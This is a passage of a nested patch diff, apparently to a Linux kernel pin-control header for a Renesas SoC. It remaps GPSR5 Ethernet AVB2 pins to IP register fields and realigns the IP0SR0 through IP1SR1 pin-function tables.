+-#define GPSR5_20	FM(AVB2_RX_CTL)
+-#define GPSR5_19	FM(AVB2_TX_CTL)
+-#define GPSR5_18	FM(AVB2_RXC)
+-#define GPSR5_17	FM(AVB2_RD0)
+-#define GPSR5_16	FM(AVB2_TXC)
+-#define GPSR5_15	FM(AVB2_TD0)
+-#define GPSR5_14	FM(AVB2_RD1)
+-#define GPSR5_13	FM(AVB2_RD2)
+-#define GPSR5_12	FM(AVB2_TD1)
+-#define GPSR5_11	FM(AVB2_TD2)
+-#define GPSR5_10	FM(AVB2_MDIO)
+-#define GPSR5_9		FM(AVB2_RD3)
+-#define GPSR5_8		FM(AVB2_TD3)
+-#define GPSR5_7		FM(AVB2_TXCREFCLK)
+-#define GPSR5_6		FM(AVB2_MDC)
+-#define GPSR5_5		FM(AVB2_MAGIC)
+-#define GPSR5_4		FM(AVB2_PHY_INT)
+-#define GPSR5_3		FM(AVB2_LINK)
+-#define GPSR5_2		FM(AVB2_AVTP_MATCH)
+-#define GPSR5_1		FM(AVB2_AVTP_CAPTURE)
+-#define GPSR5_0		FM(AVB2_AVTP_PPS)
++#define GPSR5_20	F_(AVB2_RX_CTL,		IP2SR5_19_16)
++#define GPSR5_19	F_(AVB2_TX_CTL,		IP2SR5_15_12)
++#define GPSR5_18	F_(AVB2_RXC,		IP2SR5_11_8)
++#define GPSR5_17	F_(AVB2_RD0,		IP2SR5_7_4)
++#define GPSR5_16	F_(AVB2_TXC,		IP2SR5_3_0)
++#define GPSR5_15	F_(AVB2_TD0,		IP1SR5_31_28)
++#define GPSR5_14	F_(AVB2_RD1,		IP1SR5_27_24)
++#define GPSR5_13	F_(AVB2_RD2,		IP1SR5_23_20)
++#define GPSR5_12	F_(AVB2_TD1,		IP1SR5_19_16)
++#define GPSR5_11	F_(AVB2_TD2,		IP1SR5_15_12)
++#define GPSR5_10	F_(AVB2_MDIO,		IP1SR5_11_8)
++#define GPSR5_9		F_(AVB2_RD3,		IP1SR5_7_4)
++#define GPSR5_8		F_(AVB2_TD3,		IP1SR5_3_0)
++#define GPSR5_7		F_(AVB2_TXCREFCLK,	IP0SR5_31_28)
++#define GPSR5_6		F_(AVB2_MDC,		IP0SR5_27_24)
++#define GPSR5_5		F_(AVB2_MAGIC,		IP0SR5_23_20)
++#define GPSR5_4		F_(AVB2_PHY_INT,	IP0SR5_19_16)
++#define GPSR5_3		F_(AVB2_LINK,		IP0SR5_15_12)
++#define GPSR5_2		F_(AVB2_AVTP_MATCH,	IP0SR5_11_8)
++#define GPSR5_1		F_(AVB2_AVTP_CAPTURE,	IP0SR5_7_4)
++#define GPSR5_0		F_(AVB2_AVTP_PPS,	IP0SR5_3_0)
+ 
+ /* GPSR 6 */
+ #define GPSR6_20	F_(AVB1_TXCREFCLK,		IP2SR6_19_16)
+@@ -268,209 +268,271 @@
+ #define GPSR8_0		F_(SCL0,			IP0SR8_3_0)
+ 
+ /* SR0 */
+-/* IP0SR0 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR0_3_0	F_(0, 0)		FM(ERROROUTC_B)		FM(TCLK2_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_7_4	F_(0, 0)		FM(MSIOF3_SS1)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_11_8	F_(0, 0)		FM(MSIOF3_SS2)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_15_12	FM(IRQ3)		FM(MSIOF3_SCK)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_19_16	FM(IRQ2)		FM(MSIOF3_TXD)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_23_20	FM(IRQ1)		FM(MSIOF3_RXD)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_27_24	FM(IRQ0)		FM(MSIOF3_SYNC)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_31_28	FM(MSIOF5_SS2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR0 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR0_3_0	FM(MSIOF5_SS1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_7_4	FM(MSIOF5_SYNC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_11_8	FM(MSIOF5_TXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_15_12	FM(MSIOF5_SCK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_19_16	FM(MSIOF5_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_23_20	FM(MSIOF2_SS2)		FM(TCLK1)		FM(IRQ2_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_27_24	FM(MSIOF2_SS1)		FM(HTX1)		FM(TX1)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_31_28	FM(MSIOF2_SYNC)		FM(HRX1)		FM(RX1)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR0 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR0_3_0	FM(MSIOF2_TXD)		FM(HCTS1_N)		FM(CTS1_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR0_7_4	FM(MSIOF2_SCK)		FM(HRTS1_N)		FM(RTS1_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR0_11_8	FM(MSIOF2_RXD)		FM(HSCK1)		FM(SCK1)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR0_3_0	F_(0, 0)		FM(ERROROUTC_N_B)	FM(TCLK2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_7_4	F_(0, 0)		FM(MSIOF3_SS1)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_11_8	F_(0, 0)		FM(MSIOF3_SS2)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_15_12	FM(IRQ3)		FM(MSIOF3_SCK)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_19_16	FM(IRQ2)		FM(MSIOF3_TXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_23_20	FM(IRQ1)		FM(MSIOF3_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_27_24	FM(IRQ0)		FM(MSIOF3_SYNC)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_31_28	FM(MSIOF5_SS2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR0_3_0	FM(MSIOF5_SS1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_7_4	FM(MSIOF5_SYNC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_11_8	FM(MSIOF5_TXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_15_12	FM(MSIOF5_SCK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_19_16	FM(MSIOF5_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_23_20	FM(MSIOF2_SS2)		FM(TCLK1)		FM(IRQ2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_27_24	FM(MSIOF2_SS1)		FM(HTX1)		FM(TX1)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_31_28	FM(MSIOF2_SYNC)		FM(HRX1)		FM(RX1)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR0_3_0	FM(MSIOF2_TXD)		FM(HCTS1_N)		FM(CTS1_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR0_7_4	FM(MSIOF2_SCK)		FM(HRTS1_N)		FM(RTS1_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR0_11_8	FM(MSIOF2_RXD)		FM(HSCK1)		FM(SCK1)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR1 */
+-/* IP0SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR1_3_0	FM(MSIOF1_SS2)		FM(HTX3_A)		FM(TX3)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_7_4	FM(MSIOF1_SS1)		FM(HCTS3_N_A)		FM(RX3)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_11_8	FM(MSIOF1_SYNC)		FM(HRTS3_N_A)		FM(RTS3_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_15_12	FM(MSIOF1_SCK)		FM(HSCK3_A)		FM(CTS3_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_19_16	FM(MSIOF1_TXD)		FM(HRX3_A)		FM(SCK3)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_23_20	FM(MSIOF1_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_27_24	FM(MSIOF0_SS2)		FM(HTX1_X)		FM(TX1_X)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_31_28	FM(MSIOF0_SS1)		FM(HRX1_X)		FM(RX1_X)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR1_3_0	FM(MSIOF0_SYNC)		FM(HCTS1_N_X)		FM(CTS1_N_X)	FM(CANFD5_TX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_7_4	FM(MSIOF0_TXD)		FM(HRTS1_N_X)		FM(RTS1_N_X)	FM(CANFD5_RX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_11_8	FM(MSIOF0_SCK)		FM(HSCK1_X)		FM(SCK1_X)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_15_12	FM(MSIOF0_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_19_16	FM(HTX0)		FM(TX0)			F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_23_20	FM(HCTS0_N)		FM(CTS0_N)		FM(PWM8_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_27_24	FM(HRTS0_N)		FM(RTS0_N)		FM(PWM9_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_31_28	FM(HSCK0)		FM(SCK0)		FM(PWM0_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR1_3_0	FM(HRX0)		FM(RX0)			F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_7_4	FM(SCIF_CLK)		FM(IRQ4_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_11_8	FM(SSI_SCK)		FM(TCLK3)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_15_12	FM(SSI_WS)		FM(TCLK4)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_19_16	FM(SSI_SD)		FM(IRQ0_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_23_20	FM(AUDIO_CLKOUT)	FM(IRQ1_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_27_24	FM(AUDIO_CLKIN)		FM(PWM3_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_31_28	F_(0, 0)		FM(TCLK2)		FM(MSIOF4_SS1)	FM(IRQ3_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP3SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP3SR1_3_0	FM(HRX3)		FM(SCK3_A)		FM(MSIOF4_SS2)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_7_4	FM(HSCK3)		FM(CTS3_N_A)		FM(MSIOF4_SCK)	FM(TPU0TO0_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_11_8	FM(HRTS3_N)		FM(RTS3_N_A)		FM(MSIOF4_TXD)	FM(TPU0TO1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_15_12	FM(HCTS3_N)		FM(RX3_A)		FM(MSIOF4_RXD)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_19_16	FM(HTX3)		FM(TX3_A)		FM(MSIOF4_SYNC)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR1_3_0	FM(MSIOF1_SS2)		FM(HTX3_A)		FM(TX3)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_7_4	FM(MSIOF1_SS1)		FM(HCTS3_N_A)		FM(RX3)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_11_8	FM(MSIOF1_SYNC)		FM(HRTS3_N_A)		FM(RTS3_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_15_12	FM(MSIOF1_SCK)		FM(HSCK3_A)		FM(CTS3_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_19_16	FM(MSIOF1_TXD)		FM(HRX3_A)		FM(SCK3)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_23_20	FM(MSIOF1_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_27_24	FM(MSIOF0_SS2)		FM(HTX1_X)		FM(TX1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_31_28	FM(MSIOF0_SS1)		FM(HRX1_X)		FM(RX1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR1_3_0	FM(MSIOF0_SYNC)		FM(HCTS1_N_X)		FM(CTS1_N_X)		FM(CANFD5_TX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_7_4	FM(MSIOF0_TXD)		FM(HRTS1_N_X)		FM(RTS1_N_X)		FM(CANFD5_RX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_11_8	FM(MSIOF0_SCK)		FM(HSCK1_X)		FM(SCK1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_15_12	FM(MSIOF0_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_19_16	FM(HTX0)		FM(TX0)			F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
